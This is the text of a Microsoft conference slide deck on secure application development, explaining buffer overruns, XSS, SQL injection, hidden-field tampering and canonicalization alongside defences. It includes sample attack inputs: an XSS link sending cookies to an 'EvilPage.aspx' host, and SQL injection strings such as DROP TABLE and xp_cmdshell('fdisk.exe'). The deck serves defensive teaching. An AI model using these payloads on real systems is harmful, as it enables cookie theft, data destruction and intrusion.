Microsoft Australia Security Summit Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd .

Microsoft Australia Security Summit

Managing Risk: Managing Risk:

Application Development Application Development Principles and Best PracticesPrinciples and Best Practices

Dave GloverMicrosoft Pty Ltdhttp://blogs.msdn.com/dglover


The Gartner Group states: "Today over 70% of attacks against a

company's Web site or Web application come at the 'Application Layer' not the Network or System layer."


Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally


Buffer OverrunsOccurs when data exceeds the expected size and overwrites other values

Exists primarily in unmanaged C/C++ code

Includes four types: Stack-based

Heap overruns

V-table and function pointer overwrites

Exception handler overwrites

Can be exploited by worms and can result in:

Access Violation (Denial of Service)

Instability

Code Injection


How Stack-Based Buffer Overruns Work

#include <string.h>

void flawed(char * str) {char buffer[10]; strcpy(buffer, str);

}

void main() { flawed("This string is too long");

}


Defending Against Buffer Overruns

Deprecated and should be avoided…Strcpy, strncpy, CopyMemory MultiByteToWideChar,…

Use strsafe.h for safer buffer handlingUse the /GS compile option in Visual C++ .NETCheck all array indexesUse recognized file-path processing methods, such as splitpath (C runtime)Use managed code

But pay attention to PInvoke and COM Interop


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally


Arithmetic Errors

Occur when the limitations of a variable are exceeded

Lead to serious runtime issues

Are often overlooked and underestimated

Include:Overflow – value too large for data type

Underflow – value too small for data type


Arithmetic Overflow- CalEngine- Purchase.aspx- GoodPurchase.aspx


Defending Against Arithmetic Errors

Understand the Limitations

Unit Test Boundary Conditions

Consider limitations of data types

Consider writing safe, reusable functions

Consider using a safe template class (if coding in C++)

Use Languages that support overflow checking – VB.NET and C# !!


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally


Cross-Site Scripting

Malicious script is sent to a Web application as input.

Echoed back to a user’s browser, where it is executed

Targets your users, your application is the vehicle

Attacks are via carefully crafted hyperlinks

Allows hackers to:Execute malicious script in a client’s Web browser

Insert <script>, <object>, <applet>, <form>, and <embed> tags

Steal Web session information and cookies (inc Authentication)

Access the client computer resources


How Cross-Site Scripting Works

<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=‘ + document.cookie);</script>">…</a>

Query string contains embedded JavaScript thatredirects to the hacker’s page and transmits anycookies issued by Search.aspx in a query string

URL points to the site that the hacker wants to attack


What Is One-Click Attack

Site offers persistent sign-in option (cookies)

Victim user navigates to (or opens) an HTML page – perhaps a “once in a lifetime offer”

One or more actions are carried out using the trustof the victim user which is completely unsuspectingto that user


Cross Site Script Attacks- Search.aspx- Review.aspx- AntiXSS Library- Secure Controls- GoodSearch.aspx- Validation Controls- Secure Frames- One Click Attack


Defending Against Cross-Site Scripting Attacks

Do notTrust user input

Echo client-supplied data without encoding

Store secret information in cookies

DoTake advantage of ASP.NET’s validateRequest

Take advantage of ASP.NET’s ViewStateUserKey

Consider AntiXSS for data encoding

Use the HttpOnly cookie option

Use the <frame> security attribute

Implement Secure Custom Controls


Defending Against XSSInput validation – First line of defense

Output encoding

Platform features

Server.HtmlEncode() Ok: principle of exclusions or black-listing

Use Anti-XSSBetter: principle of inclusions or white-listing

Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:

Bad code:

someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS:

someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";

Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:

Bad code:

someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS:

someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";


Defending Against One-Click Attack

Browser’s cross-frame security limits this to a “write-only” attack

Concept for defense: Require a data element in the request which the attacker can’t supply

Check Referrer field

In .Net 1.1 use ViewStateUserKey

override protected void OnInit(EventArgs e){// ...

ViewStateUserKey = User.Identity.Name;// ...}

override protected void OnInit(EventArgs e){// ...

ViewStateUserKey = User.Identity.Name;// ...}


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally


SQL Injection

Adds SQL statements to user input to:Probe databases, execute multiple SQL statements

Bypass authorization

Call built-in stored procedures

Exploits applications that don’t validate input

Input from <form> fields, query strings, cookies


How SQL Injection Works

SELECT COUNT (*) FROM UsersWHERE UserName=‘Jeff’AND Password=‘imbatman’

SELECT COUNT (*) FROM UsersWHERE UserName=‘’ or 1=1--AND Password=‘’

Model Query

Malicious Query

"or 1=1" matches everyrecord in the table

"--" comments out theremainder of the query


Examples Of SQL Injection

If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following

ALFKI1001

ALFKI1001' or 1=1 --

ALFKI1001'; DROP TABLE OrderDetail --

ALFKI1001'; exec xp_cmdshell('fdisk.exe') --

sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));

sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));


SQL Injection Attack- Login Attack- Search Page Attack- SQL Cmd Shell Attack


Defending Against SQL Injection

Code against SQL Injection AttacksSanitize all inputDon’t use Dynamic SQL commandsUse Secured Stored Procedures or Parameterized Commands

Run with least privilegeNever execute as “sa”Restrict access to built-in stored procedures

Store connection strings securelyIntegrated Security BetterEncrypt Web.Config Connections SectionDPAPI or Configuration Application Block

Do not echo database errors (fail intelligently)Apply administrative protections to SQL Server

http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally



Inappropriate use of algorithmsCreating your own

Using weak ones

Incorrect application

Failure to keep keys secureInsecure storage

Extensive duration of use

The human factorAccidental release of private keys

Key

Plaintext

Ciphertext

Algorithm

I need three of the above to decrypt

your data!

I need three of the above to decrypt

your data!


Defending Against Cryptography Weaknesses

Recycle keys periodically

Use ACLs to restrict access to keys

Store keys on an external device

Use larger keys to provide increased security

Use DPAPI to simplify key management, if possible

Do not implement your own cryptographic routines


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally


Hidden-Field Tampering

Exploits applications that persist data between requests by round-tripping it in hidden <input> fields

The techniqueLook for <input type="hidden" … > tags

Submit bogus requests with modified value attributes to spoof a Web server


How Hidden-Field Tampering Works

<input type="hidden" id="price" value="10000.00">

Page contains this…

Postback data should contain this…price="10000.00"

Instead it contains this…price="1.00"


Agenda

Buffer Overruns

Arithmetic Errors


SQL Injection





The Others…

… And Finally



There is usually more than one way to name something

Alternate representations exist for:File names

URLs

Devices (such as printers)

Hackers may exploit code that makes decisions based on file names or URLs


Canonicalization IssuesExample 1: File Names

1 MyLongFile.txt

2 MyLongFile.txt.

3 MyLong~1.txt

4 MyLongFile.txt::$DATA


Defending Against Canonicalization Issues

Use file-system security to restrict access to private data

Never make a decision based on a name

Disable the IIS Parent Paths setting

Encrypt Web.Config Sections


Encrypting Web.config sectionsaspnet_regiis -pc "SampleKeys" -exp aspnet_regiis -pa "SampleKeys" “domain\acct”aspnet_regiis -pef connectionStrings .aspnet_regiis -pdf connectionStrings .Web.config<configProtectedData defaultProvider="SampleProvider"> <providers> <add name="SampleProvider"

type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL“ keyContainerName="SampleKeys" useMachineContainer="true" />

</providers> </configProtectedData>


Traversal Attacks- PathTraversal.htm- ViewImage.aspx- GoodProducts.aspx- Web.Config Encryption


Next Steps

Stay informed about securityMicrosoft Developers Network Security Center

http://msdn.microsoft.com/security/

Microsoft Security Guidance

http://www.microsoft.com/security/guidance/

Get additional security trainingFind online and in-person training seminars:

http://www.microsoft.com/seminar/events/security/

Read the book: Writing Secure CodeMichael Howard and David LeBlanc

ISBN: 0-7356-1722-8


Defending Against the Others

Improving Web Application SecurityThreats and Countermeasures

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp


Security e-forum site www.microsoft.com.au/eforum

View On demand web casts of all presentations from this event (tell your work colleagues!)Online Live chats

Have a live chat with the Microsoft security experts you’ll see today. Check the e-forum site for the Live Chat schedule.

Plus lots more…

Evaluation forms - we value your feedback! Need help with your business’ security?

Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your Security challenges

Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360

Security seminar follow up…


Microsoft Australia Security Summit Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd .

Documents

comdglover slide

data type slide

buffer overflow

com interop slide

web application

companys web site

safer buffer handlingstrsafe

limitations of data